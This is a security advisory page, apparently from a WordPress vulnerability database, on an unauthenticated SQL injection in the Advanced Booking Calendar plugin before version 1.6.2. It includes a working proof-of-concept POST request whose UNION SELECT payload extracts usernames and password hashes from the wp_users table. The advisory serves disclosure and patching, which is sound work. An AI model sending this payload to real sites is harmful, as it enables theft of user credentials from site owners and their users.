logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Advanced Booking Calendar < 1.6.2 - Unauthenticated SQL Injection

Description

The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Cookie:
cache-control: no-cache

calendarId=1)+UNION+SELECT+1%2Cuser_login%2C3%2C4%2C5%2C6%2C7%2C2%2Cuser_pass+FROM+wp_users+WHERE+ID%3D1+and+ID+IN+(+1+&from=2010-05-05&to=2010-05-09&action=abc_booking_getBookingResult

Affects Plugins

advanced-booking-calendar

Fixed in version 1.6.2

References

URL

https://plugins.trac.wordpress.org/changeset/2202805

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Lenon Leite

Submitter

Lenon Leite

Submitter twitter

lenonleite

Verified

Yes

WPVDB ID

bac7b590-70de-45b3-bdc2-19f90524ca39

Timeline

Publicly Published

2020-10-22 (about 1 years ago)

Added

2020-10-22 (about 1 years ago)

Last Updated

2020-10-22 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin